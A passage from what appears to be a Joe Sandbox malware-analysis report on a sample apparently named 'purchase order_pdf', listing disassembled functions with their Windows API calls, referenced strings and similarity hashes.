GetDlgItem.USER32(?,00000002), ref: 008CC7C1
GetWindowRect.USER32(00000000,?), ref: 008CC7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008CC827
GetDlgItem.USER32(?,000003E9), ref: 008CC835
GetWindowRect.USER32(00000000,?), ref: 008CC846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008CC889
GetDlgItem.USER32(?,000003EA), ref: 008CC897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008CC8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 008CC8C1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7fe2977f34b9816fd748ea277c0d5303fd55893d3f0784c503cbb87aad9f6a04
Instruction ID: 0d9cd0e0ffc666cc0fad43ba6e5befcef274a064b627b6ec5ea964c5fe1d1ad3
Opcode Fuzzy Hash: 7fe2977f34b9816fd748ea277c0d5303fd55893d3f0784c503cbb87aad9f6a04
Instruction Fuzzy Hash: 22512D71B00205ABDB18CFB9DD99EAEBBB6FF98710F14812DF619D6291DB709900CB50

Function 0087201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00871B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00872036,?,00000000,?,?,?,?,008716CB,00000000,?), ref: 00871B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008720D3
KillTimer.USER32(-00000001,?,?,?,?,008716CB,00000000,?,?,00871AE2,?,?), ref: 0087216E
DestroyAcceleratorTable.USER32(00000000), ref: 008ABEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008716CB,00000000,?,?,00871AE2,?,?), ref: 008ABF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008716CB,00000000,?,?,00871AE2,?,?), ref: 008ABF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008716CB,00000000,?,?,00871AE2,?,?), ref: 008ABF5A
DeleteObject.GDI32(00000000), ref: 008ABF6C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: cd7bbf2cc09e9ef361c84d8c4dd1b0b9c67c155254998892bf0c385d1e333445
Instruction ID: 533cd166cf7ea4c865c26aa5cef5f56b53bc6c94d34560bc76298044ab1ac3d6
Opcode Fuzzy Hash: cd7bbf2cc09e9ef361c84d8c4dd1b0b9c67c155254998892bf0c385d1e333445
Instruction Fuzzy Hash: AF618830114A10EFDB259F28CD48B29B7F1FF45316F54C428E146C6A69CB75E890EFA1

Function 008721A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 008725DB: GetWindowLongW.USER32(?,000000EB), ref: 008725EC

GetSysColor.USER32(0000000F), ref: 008721D3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 243594dca5c10898d11daf602c4fd4077e206ff0e185aaf890949ce3e4319e94
Instruction ID: 117ac7258912b4f4720a09ae06e94b4eb306de2d483a2eafc34fed1d372d6166
Opcode Fuzzy Hash: 243594dca5c10898d11daf602c4fd4077e206ff0e185aaf890949ce3e4319e94
Instruction Fuzzy Hash: 3C417131104144AADB255F38DC88BB977A5FF06325F248265FE69CA1EBC731CD82DB61

Function 008DAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,008FF910), ref: 008DAB76
GetDriveTypeW.KERNEL32(00000061,0092A620,00000061), ref: 008DAC40
_wcscpy.LIBCMT ref: 008DAC6A

Strings

removable, xrefs: 008DABA8
all, xrefs: 008DAB7C
cdrom, xrefs: 008DAB92
fixed, xrefs: 008DABBE
ramdisk, xrefs: 008DABEA
network, xrefs: 008DABD4
unknown, xrefs: 008DAC01

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 50edb2c835e8834900c861881d91f136e2ddf820a017c0ac9c80f1f74acd8dc5
Instruction ID: 7a322ec9063cff6f96179f4a6a1dc404842c3137625379029ec0c3532ae6c417
Opcode Fuzzy Hash: 50edb2c835e8834900c861881d91f136e2ddf820a017c0ac9c80f1f74acd8dc5
Instruction Fuzzy Hash: 2D51AD311183059FC714EF18C881EAEB7A5FF81314F248A2AF596D73A6DB31D94ACA53

Function 00879997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 008799C2
__swprintf.LIBCMT ref: 00879A0C
__i64tow.LIBCMT ref: 008AFA0F

Strings

True, xrefs: 008AF9D0
0x%p, xrefs: 008AF9F1
False, xrefs: 008AF9D7
%.15g, xrefs: 00879A06

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: ff0936651f6be86d247d8acd72b66fadf92595b213695e19fe2d1af9a828a15d
Instruction ID: b02f55f8f02a76ea2d08726fbe7dfdd3b2f948aaa90094ef637802d62a7bd86f
Opcode Fuzzy Hash: ff0936651f6be86d247d8acd72b66fadf92595b213695e19fe2d1af9a828a15d
Instruction Fuzzy Hash: 6F410531504609AFEF24EB78D841F767BE4FB45304F28846EE68DD6296EE31D901CB12

Function 008F73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008F73D9
CreateMenu.USER32 ref: 008F73F4
SetMenu.USER32(?,00000000), ref: 008F7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F7490
IsMenu.USER32(?), ref: 008F74A6
CreatePopupMenu.USER32 ref: 008F74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008F74DD
DrawMenuBar.USER32 ref: 008F74E5

Strings

0, xrefs: 008F73CF
F, xrefs: 008F74D1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: bd08f5ee573fab91e5350d57ef0727eba814d50b93f2e8fdceca91c578f22035
Instruction ID: b0092237dab443dd3b5ae111fff54e033f6df3a4c2d81c32ea768f401b5f554d
Opcode Fuzzy Hash: bd08f5ee573fab91e5350d57ef0727eba814d50b93f2e8fdceca91c578f22035
Instruction Fuzzy Hash: 79412575A04209EFEB20DF68D884EAABBB9FF59310F144029EA55A7361D731A910CF64

Function 008F772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008F77CD
CreateCompatibleDC.GDI32(00000000), ref: 008F77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008F77E7
SelectObject.GDI32(00000000,00000000), ref: 008F77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 008F77FA
DeleteDC.GDI32(00000000), ref: 008F7803
GetWindowLongW.USER32(?,000000EC), ref: 008F780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008F7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008F782D

Strings

static, xrefs: 008F7765

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 3479781a13317336dd05983d1844e17b3ad526e8099d7bbd706c8d2af1a07dc2
Instruction ID: a0d631e447f8d741b1bbde4c7701a0239e238898c61ff616a087610b43701be5
Opcode Fuzzy Hash: 3479781a13317336dd05983d1844e17b3ad526e8099d7bbd706c8d2af1a07dc2
Instruction Fuzzy Hash: EE314732115219ABEB129FB4DC08FEA3B69FF09361F114224FB15E61A1CB359821DBA4

Function 00897040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0089707B

Part of subcall function 00898D68: __getptd_noexit.LIBCMT ref: 00898D68

__gmtime64_s.LIBCMT ref: 00897114
__gmtime64_s.LIBCMT ref: 0089714A
__gmtime64_s.LIBCMT ref: 00897167
__allrem.LIBCMT ref: 008971BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008971D9
__allrem.LIBCMT ref: 008971F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0089720E
__allrem.LIBCMT ref: 00897225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00897243
__invoke_watson.LIBCMT ref: 008972B4

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 0f7bfde9754c3c46cef566ec3b09ba9553fe29754f846b99d4ffc02d06148bc3
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 8F71E471A14B16ABEF14BF7DCC41B6AB3A8FF51324F18422AF415E7681E770EA008791

Function 008D2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D2A31
GetMenuItemInfoW.USER32(00936890,000000FF,00000000,00000030), ref: 008D2A92
SetMenuItemInfoW.USER32(00936890,00000004,00000000,00000030), ref: 008D2AC8
Sleep.KERNEL32(000001F4), ref: 008D2ADA
GetMenuItemCount.USER32(?), ref: 008D2B1E
GetMenuItemID.USER32(?,00000000), ref: 008D2B3A
GetMenuItemID.USER32(?,-00000001), ref: 008D2B64
GetMenuItemID.USER32(?,?), ref: 008D2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008D2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008D2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008D2C24

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 33e23b0dd0532fa67e6f56f70cf5e887138c9ca69ded7c6b3ee0c92cf4281d48
Instruction ID: 1ea71ce4fae43228434d2c884c1db4c7832e893fa5bb7f5747268843032788cc
Opcode Fuzzy Hash: 33e23b0dd0532fa67e6f56f70cf5e887138c9ca69ded7c6b3ee0c92cf4281d48
Instruction Fuzzy Hash: 06619BB0910249EFDB21CF64C888EBEBBB8FB25318F14465AE851E7351D771AD05DB21

Function 008F7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008F7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008F7217
GetWindowLongW.USER32(?,000000F0), ref: 008F723B
_memset.LIBCMT ref: 008F724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008F725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008F72D6

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 597e88815d7bce7c90d6c47ae32d8705884a6db7528a594dc7272ad173863148
Instruction ID: 774faed9b7b35911b92edea3bf55ec1759854b39fa10a6174571f8f6ca29ea30
Opcode Fuzzy Hash: 597e88815d7bce7c90d6c47ae32d8705884a6db7528a594dc7272ad173863148
Instruction Fuzzy Hash: 17615875904208AFEB20DFA8CC81EEE77F8FB09714F144159FA15E72A1D770A945DB60

Function 008C710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008C7135
SafeArrayAllocData.OLEAUT32(?), ref: 008C718E
VariantInit.OLEAUT32(?), ref: 008C71A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 008C71C0
VariantCopy.OLEAUT32(?,?), ref: 008C7213
SafeArrayUnaccessData.OLEAUT32(?), ref: 008C7227
VariantClear.OLEAUT32(?), ref: 008C723C
SafeArrayDestroyData.OLEAUT32(?), ref: 008C7249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008C7252
VariantClear.OLEAUT32(?), ref: 008C7264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008C726F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: c38612332481cf2a8d720317fc3a9706479274a39b63d79bc8e775f4425109e3
Instruction ID: a2e604242ffe00647898c79d9cfb75e2991d3c81d305f01a7981a2a96106b463
Opcode Fuzzy Hash: c38612332481cf2a8d720317fc3a9706479274a39b63d79bc8e775f4425109e3
Instruction Fuzzy Hash: 4E413035904119AFCB00DF68D844EAEBBB9FF58354F008069F956E7261DB30E945CF95

Function 008E5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 008E5AA6
inet_addr.WSOCK32(?,?,?), ref: 008E5AEB
gethostbyname.WSOCK32(?), ref: 008E5AF7
IcmpCreateFile.IPHLPAPI ref: 008E5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008E5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008E5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 008E5C00
WSACleanup.WSOCK32 ref: 008E5C06

Strings

Ping, xrefs: 008E5B29

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 04354f1a4a5b1a7931a55ab9339b98c54c62bfda7fa9a2b02faa446c3783ae9e
Instruction ID: ad3303e247b925a3d38fb80adb46d4649e81154db4e16d80aaa4f8973e45c766
Opcode Fuzzy Hash: 04354f1a4a5b1a7931a55ab9339b98c54c62bfda7fa9a2b02faa446c3783ae9e
Instruction Fuzzy Hash: DA519031604740AFDB21AF25CC85F2AB7E4FF85724F148929F699DB2A1DB70E840CB56

Function 008DB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008DB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008DB7B1
GetLastError.KERNEL32 ref: 008DB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 008DB828

Strings

INVALID, xrefs: 008DB7FA
NOTREADY, xrefs: 008DB7E7
UNKNOWN, xrefs: 008DB7E0
READY, xrefs: 008DB801
READONLY, xrefs: 008DB7F3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 9cafa98617a7bff8f18d1c34675022c5570ac97b712365c7fbf8784e48d2f59f
Instruction ID: eea6ac8ab43d72cd9d93509e47bdb07c7c9e993d449dc021b519399e61bf1cf7
Opcode Fuzzy Hash: 9cafa98617a7bff8f18d1c34675022c5570ac97b712365c7fbf8784e48d2f59f
Instruction Fuzzy Hash: C7318035A00209DFDB00EF68D885EBE7BB4FF84754F11812AE506D7396DB719942CB51

Function 008C9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008CB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008CB0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008C94F6
GetDlgCtrlID.USER32 ref: 008C9501
GetParent.USER32 ref: 008C951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 008C9520
GetDlgCtrlID.USER32(?), ref: 008C9529
GetParent.USER32(?), ref: 008C9545
SendMessageW.USER32(00000000,?,?,00000111), ref: 008C9548

Strings

ComboBox, xrefs: 008C947E
ListBox, xrefs: 008C94B3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: e76715250de74180f0a3bde689f86b53044558f448aa8aecef46b4bd91df5179
Instruction ID: 8a29e931cc56c5843a114cd96d54a26e4de2601d560f6f9c1c96a65b78fc2e0d
Opcode Fuzzy Hash: e76715250de74180f0a3bde689f86b53044558f448aa8aecef46b4bd91df5179
Instruction Fuzzy Hash: B821B270A00104ABCF05AB64CC85EFEBB74FF55300F204169FA61D72A6DB799919DA21

Function 008C955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008CB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008CB0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008C95DF
GetDlgCtrlID.USER32 ref: 008C95EA
GetParent.USER32 ref: 008C9606
SendMessageW.USER32(00000000,?,00000111,?), ref: 008C9609
GetDlgCtrlID.USER32(?), ref: 008C9612
GetParent.USER32(?), ref: 008C962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 008C9631

Strings

ComboBox, xrefs: 008C9569
ListBox, xrefs: 008C959E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 59786da60a0c6f6246333821b3e7282fc9ad046b550e33561fcd42d58f0bd49e
Instruction ID: a0f6816aae66e98be72185fb181190a691cc91161f23a683773619930fae29fc
Opcode Fuzzy Hash: 59786da60a0c6f6246333821b3e7282fc9ad046b550e33561fcd42d58f0bd49e
Instruction Fuzzy Hash: AA21A474A00104BBDF01AB74CC85EFEBB78FF55300F104059F951D71A6DB799919DA21

Function 008C9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 008C9651
GetClassNameW.USER32(00000000,?,00000100), ref: 008C9666
_wcscmp.LIBCMT ref: 008C9678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008C96F3

Strings

SHELLDLL_DefView, xrefs: 008C9672
details, xrefs: 008C96A1
smallicons, xrefs: 008C96BB
